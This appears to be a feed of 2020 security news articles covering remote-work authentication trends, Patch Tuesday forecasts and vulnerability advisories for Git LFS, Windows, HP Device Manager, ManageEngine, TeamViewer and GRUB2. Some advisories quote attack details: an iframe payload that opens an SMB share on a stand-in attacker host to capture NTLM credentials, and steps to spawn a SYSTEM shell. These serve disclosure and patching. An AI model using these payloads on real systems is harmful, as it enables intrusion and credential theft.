The security consequences of massive change in how we work

Organizations underwent an unprecedented IT change this year amid a massive shift to remote work, accelerating adoption of cloud technology, Duo Security reveals.

security consequences work

The security implications of this transition will reverberate for years to come, as the hybrid workplace demands the workforce to be secure, connected and productive from anywhere.

The report details how organizations, with a mandate to rapidly transition their entire workforce to remote, turned to remote access technologies such as VPN and RDP, among numerous other efforts.

As a result, authentication activity to these technologies swelled 60%. A complementary survey recently found that 96% of organizations made cybersecurity policy changes during the COVID-19, with more than half implementing MFA.

Cloud adoption also accelerated

Daily authentications to cloud applications surged 40% during the first few months of the pandemic, the bulk of which came from enterprise and mid-sized organizations looking to ensure secure access to various cloud services.

As organizations scrambled to acquire the requisite equipment to support remote work, employees relied on personal or unmanaged devices in the interim. Consequently, blocked access attempts due to out-of-date devices skyrocketed 90% in March. That figure fell precipitously in April, indicating healthier devices and decreased risk of breach due to malware.

“As the pandemic began, the priority for many organizations was keeping the lights on and accepting risk in order to accomplish this end,” said Dave Lewis, Global Advisory CISO, Duo Security at Cisco. “Attention has now turned towards lessening risk by implementing a more mature and modern security approach that accounts for a traditional corporate perimeter that has been completely upended.”

Additional report findings

So long, SMS – The prevalence of SIM-swapping attacks has driven organizations to strengthen their authentication schemes. Year-over-year, the percentage of organizations that enforce a policy to disallow SMS authentication nearly doubled from 8.7% to 16.1%.

Biometrics booming – Biometrics are nearly ubiquitous across enterprise users, paving the way for a passwordless future. Eighty percent of mobile devices used for work have biometrics configured, up 12% the past five years.

Cloud apps on pace to pass on-premises apps – Use of cloud apps are on pace to surpass use of on-premises apps by next year, accelerated by the shift to remote work. Cloud applications make up 13.2% of total authentications, a 5.4% increase year-over-year, while on-premises applications encompass 18.5% of total authentications, down 1.5% since last year.

Apple devices 3.5 times more likely to update quickly vs. Android – Ecosystem differences have security consequences. On June 1, Apple iOS and Android both issued software updates to patch critical vulnerabilities in their respective operating systems.

iOS devices were 3.5 times more likely to be updated within 30 days of a security update or patch, compared to Android.

Windows 7 lingers in healthcare despite security risks – More than 30% of Windows devices in healthcare organizations still run Windows 7, despite end-of-life status, compared with 10% of organizations across Duo’s customer base.

Healthcare providers are often unable to update deprecated operating systems due to compliance requirements and restrictive terms and conditions of third-party software vendors.

Windows devices, Chrome browser dominate business IT – Windows continues its dominance in the enterprise, accounting for 59% of devices used to access protected applications, followed by macOS at 23%. Overall, mobile devices account for 15% of corporate access (iOS: 11.4%, Android: 3.7%).

On the browser side, Chrome is king with 44% of total browser authentications, resulting in stronger security hygiene overall for organizations.

UK and EU trail US in securing cloud – United Kingdom and European Union-based organizations trail US-based enterprises in user authentications to cloud applications, signaling less cloud use overall or a larger share of applications not protected by MFA.

November 2020 Patch Tuesday forecast: Significant OS changes ahead

November Patch Tuesday and the end-of-year holidays are rapidly approaching. Microsoft gave us a late release or maybe an early gift depending upon how you look at the new version of Windows 10. The Patch Tuesday updates appear to be light, so things are looking much better as we enter the final stretch for 2020.

November 2020 Patch Tuesday forecast

The big announcement this month is the release of Windows 10 version 20H2 on October 20. Yes, you read that correctly – not the 2020 Fall Release or Windows 10 version 2009, but Windows 10 version 20H2. Name changes once again!

This update follows the feature enablement model that began last year with Windows 10 versions 1903 and 1909. The new features in Windows 10 version 20H2 are also included in the October cumulative update for Windows 10 version 2004, although they are dormant. They can be turned on via a special enablement package.

A big change regarding servicing stack updates (SSU) and the latest cumulative updates (LCU) has finally been made – LCUs and SSUs have been combined into a single cumulative monthly update! Moving forward we don’t have to worry about managing these separately. Microsoft recommends applying the latest SSU for Windows 10, version 2004 and then you can forget about SSUs in the future because they are automatically applied as needed in the cumulative updates.

This release also includes a few security updates for Microsoft Defender Advanced Threat Protection (ATP), Microsoft Defender Application Guard for Office, and biometric enhancements for Windows Hello.

Each new release comes with its share of reported issues, so please review before you update to this latest version. From some of the forums I monitor, I’ve noted a lot of conversations around device drivers and device support in general. I suspect this is not an issue unique to Windows 10 version 20H2, but is part of a carryover from Microsoft now enforcing properly signed drivers, which began last month in the cumulative update. There are a lot of good reasons to update your OS, but always ‘look before you leap’ to ensure a smooth transition.

November 2020 Patch Tuesday forecast

  • Expect Microsoft to get back on track this month. There was a major dip in common vulnerabilities and exposures (CVEs) addressed last month, and for the first time I can remember there were no updates for Internet Explorer or Edge. Anticipate updates for the standard operating systems, browsers, Office, and extended support updates for Windows 7 and Server 2008. Servicing stack updates to include ESUs are expected.
  • Security updates were released this week for Adobe Acrobat and Reader, so I don’t expect anything next week.
  • Apple released their latest security updates for iTunes and iCloud in late September. The next updates will probably show up late this month or early December.
  • Google Chrome 86 was updated this week with a few security updates; there is a slight chance another release may come out on Patch Tuesday but don’t count on it.
  • Mozilla Firefox and Thunderbird were updated in mid-October. We should see some additional security updates next week.
  • It looks like an average Patch Tuesday for November. If you have some spare time, check out Microsoft’s latest and greatest in Windows 10 version 20H2.

Git LFS vulnerability allows attackers to compromise targets’ Windows systems (CVE-2020-27955)

A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool, security researcher Dawid Golunski has discovered.

CVE-2020-27955

It can be exploited in a variety of popular Git clients in their default configuration – GitHub CLI, GitHub Desktop, SmartGit, SourceTree, GitKraken, Visual Studio Code, etc. – and likely other clients/development IDEs (i.e., those install git with the Git LFS extension by default).

“Web applications / hosted repositories running on Windows which allow users to import their repositories from a URL may also be exposed to this vulnerability,” Golunski added.

About the vulnerability (CVE-2020-27955)

Golunski found that Git LFS does not specify a full path to git binary when executing a new git process via a specific exec.Command() function.

“As the exec.Command() implementation on Windows systems include the current directory, attackers may be able to plant a backdoor in a malicious repository by simply adding an executable file named: git.bat, git.exe, git.cmd or any other extension that is used on the victim’s system (PATHEXT environment dependent), in the main repo’s directory. As a result, the malicious git binary planted in this way will get executed instead of the original git binary located in a trusted path,” he explained.

The vulnerability can be triggered if the victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool.

Golunski says that CVE-2020-27955 is trivial to exploit, and has released PoC exploit code, as well as video demonstrations of the exploit in action on various Git clients.

What to do?

The vulnerability affects Git LFS versions 2.12 or earlier on Windows systems (but not on Unix). According to the Git LFS maintainers, there is no workaround for this issue other than avoiding untrusted repositories.

Affected users and product vendors are advised to update to the latest Git LFS version (v2.12.1, released on Wednesday), which plugged the security hole. Git for Windows has also been updated to include this Git LFS version.

New Windows Zero-Day

New Windows Zero-Day

Google’s Project Zero has discovered and published a buffer overflow vulnerability in the Windows Kernel Cryptography Driver. The exploit doesn’t affect the cryptography, but allows attackers to escalate system privileges:

Attackers were combining an exploit for it with a separate one targeting a recently fixed flaw in Chrome. The former allowed the latter to escape a security sandbox so the latter could execute code on vulnerable machines.

The vulnerability is being exploited in the wild, although Microsoft says it’s not being exploited widely. Everyone expects a fix in the next Patch Tuesday cycle.

Sidebar photo of Bruce Schneier by Joe MacInnis.

Google discloses actively exploited Windows zero-day (CVE-2020-17087)

Google researchers have made public a Windows kernel zero day vulnerability (CVE-2020-17087) that is being exploited in the wild in tandem with a Google Chrome flaw (CVE-2020-15999) that has been patched on October 20.

CVE-2020-17087

About CVE-2020-17087

CVE-2020-17087 is a vulnerability in the Windows Kernel Cryptography Driver, and “constitutes a locally accessible attack surface that can be exploited for privilege escalation (such as sandbox escape).”

More technical information has been provided in the Chromium issue tracker entry, which was kept unaccessible to the wider public for the first seven days, but has now been made public.

The researchers have also included PoC exploit code, which has been tested on Windows 10 1903 (64-bit), but they noted that the affected driver (cng.sys) “looks to have been present since at least Windows 7,” meaning that all the other supported Windows versions are probably vulnerable.

Exploitation and patching

Shane Huntley, Director of Google’s Threat Analysis Group (TAG) confirmed that the vulnerability chain is being used for targeted exploitation and that the attacks are “not related to any US election-related targeting.”

The attackers are using the Chrome bug to gain access to the target system and then the CVE-2020-17087 to gain administrator access on it.

A patch for the issue is expected to be released on November 10, as part of the monthly Patch Tuesday effort by Microsoft.

Currently we expect a patch for this issue to be available on November 10.

While the bug is serious, the fact that it’s being used in targeted (and not widespread) attacks should reassure most users they’ll be safe until the patch is released.

Also, according to a Microsoft spokesperson, exploitation of the flaw has only been spotted in conjuction with the Chrome vulnerability, which has been patched in Chrome and other Chromium-based browsers (e.g., Opera on October 21, Microsoft Edge on October 22.

Users who have implemented those updates are, therefore, safer still.

HP Device Manager vulnerabilities may allow full system takeover

Three vulnerabilities affecting HP Device Manager, an application for remote management of HP Thin Client devices, could be chained together to achieve unauthenticated remote command execution as SYSTEM, security researcher Nick Bloor has found.

HP Device Manager vulnerabilities

The vulnerabilities have been patched by HP nearly two weeks ago, but additional vulnerability and research details published on Monday may help attackers to craft a working exploit.

The vulnerabilities

Thin clients are low-performance computers optimized for establishing a remote connection with a server-based computing environment.

HP Device Manager allows IT admins to remotely deploy, update, and manage thousands of HP Thin Clients through a single console.

The three vulnerabilities discovered by Bloor “may allow locally managed accounts within HP Device Manager to be susceptible to dictionary attacks due to weak cipher implementation (CVE-2020-6925) and allow a malicious actor to remotely gain unauthorized access to resources (CVE-2020-6926), and/or allow a malicious actor to gain SYSTEM privileges (CVE-2020-6927).”

CVE-2020-6925 and CVE-2020-6926 affect all versions of HP Device Manager, CVE-2020-6927 (a privilege escalation vulnerability) affects HP Device Manager 5.0.0 to 5.0.3.

CVE-2020-6925 doesn’t impact customers who are using Active Directory authenticated accounts, HP pointed out, and CVE-2020-6927 doesn’t impact customers who are using an external database and have not installed the integrated Postgres service.

Fixes and mitigations

HP has provided a security update for the HP Device Manager 5.0.x branch – HPDM v5.0.4 – and will include the fixes for the 4.x branch in HP Device Manager 4.7 Service Pack 13.

Mitigations that partially mitigate these issues are also available, and include:

  • Limiting incoming access to Device Manager ports 1099 and 40002 to trusted IPs or localhost only
  • Removing the dm_postgres account from the Postgres database; or updating the dm_postgres account password within HP Device Manager Configuration Manager; or
    creating an inbound rule within Windows Firewall configuration to configure the PostgreSQL listening port (40006) for localhost access only.

Admins are advised to implement the offered security updates or mitigations as soon as possible.

Nmap 7.90 released: New fingerprints, NSE scripts, and Npcap 1.0.0

Over a year has passed since Nmap had last been updated, but this weekend Gordon “Fyodor” Lyon announced Nmap 7.90.

Nmap 7.90

About Nmap

Nmap is a widely used free and open-source network scanner.

The utility is used for network inventorying, port scanning, managing service upgrade schedules, monitoring host or service uptime, etc.

It works on most operating systems: Linux, Windows, macOS, Solaris, and BSD.

Nmap 7.90

First and foremost, Nmap 7.90 comes with Npcap 1.0.0, the first completely stable version of the raw packet capturing/sending driver for Windows.

Prior to Npcap, Nmap used Winpcap, but the driver hasn’t been updated since 2013, didn’t always work on Windows 10, and depended on long-deprecated Windows APIs.

“While we created Npcap for Nmap, it turns out that many other projects and companies had the same need. Wireshark switched to Npcap with their big 3.0.0 release last February, and Microsoft publicly recommends Npcap for their Azure ATP (Advanced Threat Protection) product,” Lyon explained.

“We introduced the Npcap OEM program allowing companies to license Npcap OEM for use within their products or for company-internal use with commercial support and deployment automation. This project that was expected to be a drain on our resources (but worthwhile since it makes Nmap so much better) is now helping to fund the Nmap project. The Npcap OEM program has also helped ensure Npcap’s stability by deploying it on some of the fastest networks at some of the largest enterprises in the world.”

Nmap 7.90 also comes with:

  • New fingerprints for better OS and service/version detection
  • 3 new NSE scripts, new protocol libraries and payloads for host discovery, port scanning and version detection
  • 70+ smaller bug fixes and improvements
  • Build system upgrades and code quality improvements

“We also created a special ‘Nmap OEM Edition’ for the companies who license Nmap to handle host discovery within their products. We have been selling such licenses for more than 20 years and it’s about time OEM’s have an installer more customized to their needs,” Lyon added.

September 2020 Patch Tuesday: Microsoft fixes over 110 CVEs again

On this September 2020 Patch Tuesday:

  • Microsoft has plugged 129 security holes, including a critical RCE flaw that could be triggered by sending a specially crafted email to an affected Exchange Server installation
  • Adobe has delivered security updates for Adobe Experience Manager, AEM Forms, Framemaker and InDesign
  • Intel has released four security advisories
  • SAP has released 10 security notes and updates to six previously released notes

September 2020 Patch Tuesday

Microsoft’s updates

Microsoft has released patches for 129 CVEs, 23 of which are “critical”, 105 “important”, and one “medium”-risk (a security feature bypass flaw in SQL Server Reporting Services). None of them are publicly known or being actively exploited.

Trend Micro Zero Day Initiative’s Dustin Childs says that patching CVE-2020-16875, a memory corruption vulnerability in Microsoft Exchange, should be top priority for organizations using the popular mail server.

“This patch corrects a vulnerability that allows an attacker to execute code at SYSTEM by sending a specially crafted email to an affected Exchange Server. That doesn’t quite make it wormable, but it’s about the worst-case scenario for Exchange servers,” he explained. “We have seen the previously patched Exchange bug CVE-2020-0688 used in the wild, and that requires authentication. We’ll likely see this one in the wild soon.”

Another interesting patch released this month is that for CVE-2020-0951, a security feature bypass flaw in Windows Defender Application Control (WDAC). Patches are available for Windows 10 and Windows Server 2016 and above.

“This patch is interesting for reasons beyond just the bug being fixed. An attacker with administrative privileges on a local machine could connect to a PowerShell session and send commands to execute arbitrary code. This behavior should be blocked by WDAC, which does make this an interesting bypass. However, what’s really interesting is that this is getting patched at all,” Childs explained.

“Vulnerabilities that require administrative access to exploit typically do not get patches. I’m curious about what makes this one different.”

Many of the critical and important flaws fixed this time affect various editions of Microsoft SharePoint (Server, Enterprise, Foundation). Some require authentication, but many do not, so if you don’t want to fall prey to exploits hidden in specially crafted web requests, pages or SharePoint application packages, see that you install the required updates soon.

Satnam Narang, staff research engineer at Tenable, pointed out that one of them – CVE-2020-1210 – is reminiscent of a similar SharePoint remote code execution flaw, CVE-2019-0604, that has been exploited in the wild by threat actors since at least April 2019.

CVE-2020-0922, a RCE in Microsoft COM (Common Object Model), should also be patched quickly on all Windows and Windows Server systems.

“As COM is the base framework of Microsoft services like ActiveX, OLE, DirectX, and Windows Shell, if left unpatched it would give a malicious player a large target to focus on when seeking out vulnerabilities in a network. Given that the exploit can be taken advantage of through a simple malicious JavaScript or website, potentially delivered through a phishing email, it is necessary to address to minimize a network’s attack surface,” noted Richard Melick, Senior Technical Product Manager, Automox.

He also advised organizations in the financial industry who use Microsoft Dynamics 365 for Finance and Operations (on-premises) and Microsoft Dynamics 365 (on-premises) to quickly patch CVE-2020-16857 and CVE-2020-16862.

“Impacting the on-premise servers with this finance and operations focused service installed, both exploits require a specifically created file to exploit the security vulnerability, allowing the attacker to gain remote code execution capability. More concerning with these vulnerabilities is that both flaws, if exploited, would allow an attacker to steal documents and data deemed critical. Due to the nature and use of Microsoft Dynamics in the financial industry, a theft like this could spell trouble for any company of any size,” he added.

Jimmy Graham, Sr. Director of Product Management, Qualys, says that Windows Codecs, GDI+, Browser, COM, and Text Service Module vulnerabilities should be prioritized for workstation-type devices.

Adobe’s updates

Adobe has released security updates for Adobe Experience Manager (AEM) – a web-based client-server system for building, managing and deploying commercial websites and related services – and the AEM Forms add-on package for all platforms, Adobe Framemaker for Windows and Adobe InDesign for macOS.

The AEM and AEM Forms updates are more important than the rest.

The former fix eight critical and important flaws, most of which allow arbitrary JavaScript execution or HTML injection in the browser. The latter plug three critical security holes that carry the same risk (i.e., that of an attacker running malicious code on a victim’s machine).

The Adobe Framemaker update fixes two critical flaws that could lead to code execution, and the Adobe InDesign update five of them, but as vulnerabilities in these two offerings are not often targeted by attackers, admins are advised to implement them after more critical updates are secured.

None of the fixed vulnerabilities are being currently exploited in the wild.

Intel’s updates

Intel took advantage of the September 2020 Patch Tuesday to release four advisories, accompanying fixes for the Intel Driver & Support Assistant, BIOS firmware for multiple Intel Platforms, and Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM).

The latter fixes are the most important, as they fix a privilege escalation flaw that has been deemed to be “critical” for provisioned systems.

SAP’s updates

SAP marked the September 2020 Patch Tuesday by releasing 10 security notes and updates to six previously released ones (for SAP Solution Manager, SAP NetWeaver, SAPUI5 and SAP NetWeaver AS JAVA).

Patches have been provided for newly fixed flaws in a variety of offerings, including SAP Marketing, SAP NetWeaver, SAP Bank Analyzer, SAP S/4HANA Financial Products, SAP Business Objects Business Intelligence Platform, and others.

September 2020 Patch Tuesday forecast: Back to school?

Another month has passed working from home and September Patch Tuesday is upon us. For most of us here in the US, September usually signals back to school for our children and with that comes a huge increase in traffic on our highways. But I suspect with the big push for remote learning from home, those of us in IT may be more worried about the increase in network traffic. So, should we expect a large number of updates this Patch Tuesday that will bog down our networks?

The good news is that I expect a more limited release of updates from Microsoft and third-party vendors this month. In August, we saw a HUGE set of updates for Office and also an unexpected .NET release after just having one in July.

Also looking back to last month, there were some reported issues on the Windows 10 version 1903, 1909, and 2004 updates. Applying the updates for KB 4565351 or KB 4566782 resulted in a failure for many users on automatic updates with return codes/explanations that were not very helpful. Let’s hope the updates are more stable this month without the need to re-apply, or worse, redistribute these large updates across our networks using even more bandwidth.

Last month I talked about software end-of-life (EOL) and making sure you had a plan in place to properly protect your systems in advance. Just as an early reminder we have the EOL of Windows Embedded Standard 7 coming up on October Patch Tuesday. Microsoft will offer continued Extended Security Updates (ESUs) for critical and important security updates just like they did for Windows 7 and Server 2008.

These updates will be available for three years through October 2023. Microsoft also provided an update on the ‘sunset’ of the legacy Edge browser in March 2021 along with the announcement that Microsoft 365 apps and services will no longer support IE 11 starting in August 2021. They made it clear IE 11 is not going away anytime soon, but the new Edge is required for a modern browser experience. These changes are all still a few months out but plan accordingly.

September 2020 Patch Tuesday forecast

  • We’ll see the standard operating system updates, but as I mentioned earlier, with the large Office and individual application updates release last month expect both smaller and more limited set this time.
  • Service stack updates (SSUs) are hit or miss each month. The last required update was released in May. Expect to see a few in the mix once again.
  • A security update for Acrobat and Reader came out last Patch Tuesday. There are no pre-announcements on their web site so we may see a small update, if any.
  • Apple released security updates last month for iTunes and iCloud, so we should get a break this month if they maintain their quarterly schedule.
  • Google Chrome 85 was released earlier week, but we may see a security release if they have any last-minute fixes for us.
  • We’re due for a Mozilla security update for Firefox and Thunderbird. The last security release was back on August 25.

Remote security management of both company-provided and user-attached systems provides many challenges. With a projected light set of updates this month, hopefully tying up valuable bandwidth isn’t one of those challenges.

Tech Data expands Cloud Solution Factory with Windows Virtual Desktop on Azure Click-to-Run Solution

Tech Data announced that it has expanded its Cloud Solution Factory offering with the addition of a new Windows Virtual Desktop on Azure Click-to-Run Solution, which increases remote workforce productivity while ensuring data and applications can be securely accessed from any location using any device.

“As remote work continues to accelerate and the desktop-as-a-service market grows into what Gartner expects will become a nearly $3 billion business in 2021, so too will the need for virtualization powered by cloud technology,” said Sergio Farache, executive vice president of strategy, innovation, cloud, and M&A, Tech Data.

“As a leader in cloud and next-generation solution aggregation, Tech Data makes cloud adoption simple by significantly reducing cloud configuration and deployment processes so that our channel partners can serve their customers more effectively and with fewer risks.

“We look forward to delivering higher value to our partner ecosystem with the addition of the Windows Virtual Desktop on Azure Click-to-Run Solution to our Cloud Solution Factory.”

The deployment and configuration of the Windows Virtual Desktop on Azure Click-to-Run Solution can happen in minutes, versus the hours or days it typically takes without the use of Tech Data’s automation technology stack.

The automated setup is optimized to deliver a multi-session Windows 10 experience with expanded capabilities to support graphic-intensive applications like Autodesk. The solution also ensures high-performance workloads can be accessed anywhere.

Tech Data supports Windows Virtual Desktop deployments with a variety of professional services, including the ability to conduct cloud-readiness assessments, assist with migrations and provide fully managed desktop-as-a-service offerings.

As a result, Tech Data partners can deliver a comprehensive and seamless virtual desktop experience that offers secure access to data, higher rates of compliance and the ability to facilitate an increasingly flexible virtual workplace environment that can scale on demand and meet the evolving demands of a digital workforce.

“This solution is a game-changer for us,” said Steve Slack, IT technical manager at INFINITY IT Solutions, a Tech Data reseller partner.

“Instead of investing a lot of time and money researching and developing a way to overcome this challenge ourselves, Tech Data’s solution is ready for us to take to market during this pivotal moment in which the need to optimize the remote workforce has never been so strong.

“We are confident that Tech Data’s Windows Virtual Desktop on Azure Click-to-Run Solution will help businesses that need to quickly set up a secure and productive temporary digital workspace, as well those that are embarking on longer-term digital transformation projects aimed at modernizing the way people collaborate and work in an online environment.”

To help customers strike a balance between security and productivity, Tech Data offers its Modern Workplace with Secure Score Click-to-Run Solution as a complement to any Windows Virtual Desktop deployment. Doing so establishes a security baseline with automated policy enforcement for Microsoft 365 users.

In addition, Tech Data’s Windows Virtual Desktop offering provides flexible sizing options available in the company’s StreamOne Cloud Marketplace, including the built-in capability to support graphic-intensive workloads commonly used in engineering and design applications.

The Windows Virtual Desktop on Azure Click-to-Run Solution can be automatically deployed into a new or existing Microsoft Azure subscription.

Tech Data’s Solution Factory methodology enables its channel partners and their customers to solve business challenges with click-to-run solutions that are designed for simple and fast deployment. These solutions are developed by combining Tech Data’s IT expertise with its vast ecosystem of cloud, analytics and IoT and security technologies to deliver desired business outcomes.

JumpCloud App for Windows: Enabling secure credential and identity management

JumpCloud announced the release of the JumpCloud App for Windows, the latest update to its patent-pending strategy for enabling secure credential and identity management from an employee’s device.

The release follows its Apple macOS App release, which established the company’s strategy for a device-centric approach to secure corporate password updates.

Employees safely manage and modify their credentials from within the confines of JumpCloud-managed Windows and macOS hosts, eliminating attack vectors such as phishing emails, deepfake portals, and similar social engineering methods which pose as a company’s mandated way to update passwords.

The JumpCloud Windows App streamlines credential management workflows and establishes the employee’s workstation or laptop as a trusted device.

Along with JumpCloud’s endpoint-management capabilities, i.e. System Insights, configuration policies, full disk encryption, multi-factor authentication (MFA), and user account management, the Windows App allows the employee to interact with their corporate JumpCloud identity, access their User Portal securely to launch into applications via SSO, and update their corporate password.

A password change simultaneously updates their device password in addition to all other resources the employee is connected to via JumpCloud’s cloud-based directory service.

“As users find themselves managing credentials for an ever-growing number of online platforms, they’re also targets for phishing attempts that have become increasingly sophisticated and difficult to distinguish from legitimate requests,” said KellyAnn Fitzpatrick, Industry Analyst at RedMonk.

“JumpCloud’s Windows App–like its existing offering for MacOS–is designed to help organizations eliminate the risk of email-based phishing schemes for associated user accounts by centralizing identity management on associated individuals’ devices.”

“The one place an employee should trust to manage their credentials is within their device, not over the open internet and not exclusively by an email reminder,” said Greg Keller, CTO at JumpCloud.

“JumpCloud’s security policies, MFA, and our Windows and macOS apps provide the assurance that IT and security teams need for the most secure means to protect their employees.”

Critical ManageEngine ADSelfService Plus RCE flaw patched

A critical vulnerability (CVE-2020-11552) in ManageEngine ADSelfService Plus, an Active Directory password-reset solution, could allow attackers to remotely execute commands with system level privileges on the target Windows host.

CVE-2020-11552

About ManageEngine ADSelfService Plus

ManageEngine ADSelfService Plus is developed by ManageEngine, a division of Zoho Corporation, a software development company that focuses on web-based business tools and information technology.

“ADSelfService Plus supports self-service password reset for WFH and remote users by enabling users to reset Windows password from their own machines and updating the cached credentials through a VPN client,” the company touts.

It also supports sending password expiration notifications to remote users through email, SMS, and push notifications; provides admins with a way to force 2-factor authentication for Windows logons; and provides users with secure access to all SAML-supported enterprise applications (e.g., Office 365, G Suite, Salesforce) through AD-based single sign-on.

About the vulnerability (CVE-2020-11552)

Unearthed and flagged by Bhadresh Patel, CVE-2020-11552 stems from the solution not properly enforcing user privileges associated with Windows Certificate Dialog.

The ManageEngineADSelfService Plus thick client software enables users to perform a password reset or an account unlock action by using self-service option on the Windows login screen. When one of these options is selected, the client software is launched and connects to a remote ADSelfServicePlus server to facilitate the self-service operations.

“A security alert can/will be triggered when ‘an unauthenticated attacker having physical access to the host issues a self-signed SSLcertificate to the client’. Or, ‘a (default) self-signed SSLcertificate is configured on ADSelfService Plus server’,” he noted.

“‘ViewCertificate’ option from the security alert will allow an attacker with physical access or a remote attacker with RDP access, to export a displayed certificate to a file. This will further cascade to the standard dialog/wizard which will open file explorer as SYSTEM. By navigating file explorer through ‘C:windowssystem32’, acmd.exe can be launched as a SYSTEM.”

Patel also published a PoC exploit video (the exploitation part starts at 5:30):

[embedded content]

ManageEngine patched CVE-2020-11552 twice, because the first patch only fixed the issue partially. Admins are advised to upgrade to ADSelfService Plus build 6003, which contains the complete security fix.

Researchers flag two zero-days in Windows Print Spooler

In May 2020, Microsoft patched CVE-2020-1048, a privilege escalation vulnerability in the Windows Print Spooler service discovered by Peleg Hadar and Tomer Bar from SafeBreach Labs. A month later, the two researchers found a way to bypass the patch and re-exploit the vulnerability on the latest Windows version. Microsoft assigned this vulnerability a new identification number – CVE-2020-1337 – and will patch it on August 2020 Patch Tuesday. They’ve also discovered a DoS flaw affecting … More

The post Researchers flag two zero-days in Windows Print Spooler appeared first on Help Net Security.

August 2020 Patch Tuesday forecast: Planning for the end?

There doesn’t seem to be an end in sight to the COVID-19 crisis, but there are some important end-of-life/end-of-support dates we should be aware of when it comes to software.

August 2020 Patch Tuesday forecast

Before we dig into this month’s forecast of updates, I want to spend a little time on the importance of planning ahead to avoid the high costs associated with extended support contracts, or sometimes worse, modifying your network environment to mitigate risks.

Remember when Windows XP end-of-life was a ‘date on the horizon’ that you would deal with when it got closer? Suddenly Windows 7 has reached the same point. In fact, we’ve just gone over the six-month point in the first year of Extended Support Updates for Windows 7 and Server 2008.

The operational lifespan of an operating system version is shrinking, and the model has changed as Microsoft moved to the software-as-a-service model for Windows 10. It is imperative we keep track of critical dates associated with both operating systems and applications in order to maintain a functional work environment.

Microsoft has extended the support dates on a few operating systems, but those dates are rapidly approaching. The Enterprise and Education editions of Windows 10 versions 1709 and 1803 reach end of service in October and November respectively this year. The Home and Professional editions of Windows 10 version 1809 reach end-of-service in November as well. Double check your applications to ensure compatibility as you make the operating system upgrades on these systems – you only have 2-3 months left!

We have a little breathing room for the remaining non-Windows 10 operating systems. Both Windows 8.1 and the Server 2012 variations reach their end-of-extended-support in October 2023. Once we reach that point in time, we’ll only have Windows 10 left (or the latest new operating system from Microsoft).

There will be situations where you’ll reach the end of support and there won’t be new patches for the system, but you need to maintain the operating systems and their legacy applications to meet business needs. You’ll need to look at other options to mitigate the security risks introduced by these increasingly vulnerable systems.

Consider virtualization or locking down the system to run only the specific applications you need. Electronic separation is another option—moving them from direct internet connectivity or into more protected parts of your network. Heightened monitoring through next-gen antivirus or endpoint detection and response solutions can also provide added protection. Choose what works best for you but have a plan and timeline in place for their replacement.

My forecast last month was accurate with regards to record numbers of CVEs addressed. I don’t believe we’ll see this sustained growth but expect a higher than average number to be addressed again this month.

August 2020 Patch Tuesday forecast

  • Expect a normal set of operating system and application updates, including ESUs, from Microsoft. I’ve been anticipating a SQL server or Exchange server update, so maybe it will happen this month?
  • Every operating system received a service stack update (SSU) last month. We may get a break here next week.
  • In keeping with the ‘planning for the end’ theme this month, Adobe Flash reaches end-of-life at the end of the year. Plan accordingly because a lot of applications still rely on Flash. Adobe may be giving Flash extra attention as we near the end of its life, so be on the lookout.
  • We have a pre-notification from Adobe that APSB20-48 for Acrobat and Reader should release on patch Tuesday.
  • Apple released security update 12.10.8 for Windows iTunes at the end of July. We could see a similar update for iCloud this week.
  • Google Chrome 85 is in the beta channel and may be released next week.
  • Mozilla provided security updates for Firefox 79, Firefox 68 ESR and 78 ESR, as well as Thunderbird 68 and 78 the last week of July. There is a small possibility of a minor security update for some of these applications next week.

The days of sitting on an operating system for 5-10 years with just patching are gone. Patching remains critical for the tactical protection of your systems, but strategic planning for the ongoing upgrades of operating systems and applications is the key to their long-term stability and security.

TeamViewer flaw could be exploited to crack users’ password

A high-risk vulnerability (CVE-2020-13699) in TeamViewer for Windows could be exploited by remote attackers to crack users’ password and, consequently, lead to further system exploitation.

CVE-2020-13699

About TeamViewer

TeamViewer is an application developed by German company TeamViewer GmbH and is available for Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8 and BlackBerry operating systems.

It is used primarily for remote access to and control of various types of computer systems and mobile devices, but also offers collaboration and presentation features (e.g., desktop sharing, web conferencing, file transfer, etc.)

Since the advent of COVID-19, enterprise use of the software has increased due to many employees being forced to work from home.

About the vulnerability (CVE-2020-13699)

CVE-2020-13699 is a security weakness arising from an unquoted search path or element – more specifically, it’s due to the application not properly quoting its custom URI handlers – and could be exploited when the system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.

“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play attacker-IPsharefake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.

“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

As noted before, exploitation of the flaw can be initiated remotely and requires no previous authentication. The flaw seems ideal for targeted watering hole attacks.

There is no indication that this vulnerability is being exploited in the wild and no public exploit is currently available.

CIS assesses that the risk of exploitation is high for large and medium government and business entities, medium for small government and business entities, and low for home users.

According to the company, the vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. Users are advised to upgrade to version 15.8.3 to close the hole.

Bug in widely used bootloader opens Windows, Linux devices to persistent compromise

A vulnerability (CVE-2020-10713) in the widely used GRUB2 bootloader opens most Linux and Windows systems in use today to persistent compromise, Eclypsium researchers have found. The list of affected systems includes servers and workstations, laptops and desktops, and possibly a large number of Linux-based OT and IoT systems.

CVE-2020-10713

What’s more, the discovery of this vulnerability has spurred a larger effort to audit the GRUB2 code for flaws and, as a result, seven CVE-numbered flaws and many others without a CVE have been brought to light (and have or will be fixed).

BootHole (CVE-2020-10713)

CVE-2020-10713, named “BootHole” by the researchers who discovered it, can be used to install persistent and stealthy bootkits or malicious bootloaders that will operate even when the Secure Boot protection mechanism is enabled and functioning.

“The vulnerability affects systems using Secure Boot, even if they are not using GRUB2. Almost all signed versions of GRUB2 are vulnerable, meaning virtually every Linux distribution is affected,” the researchers explained.

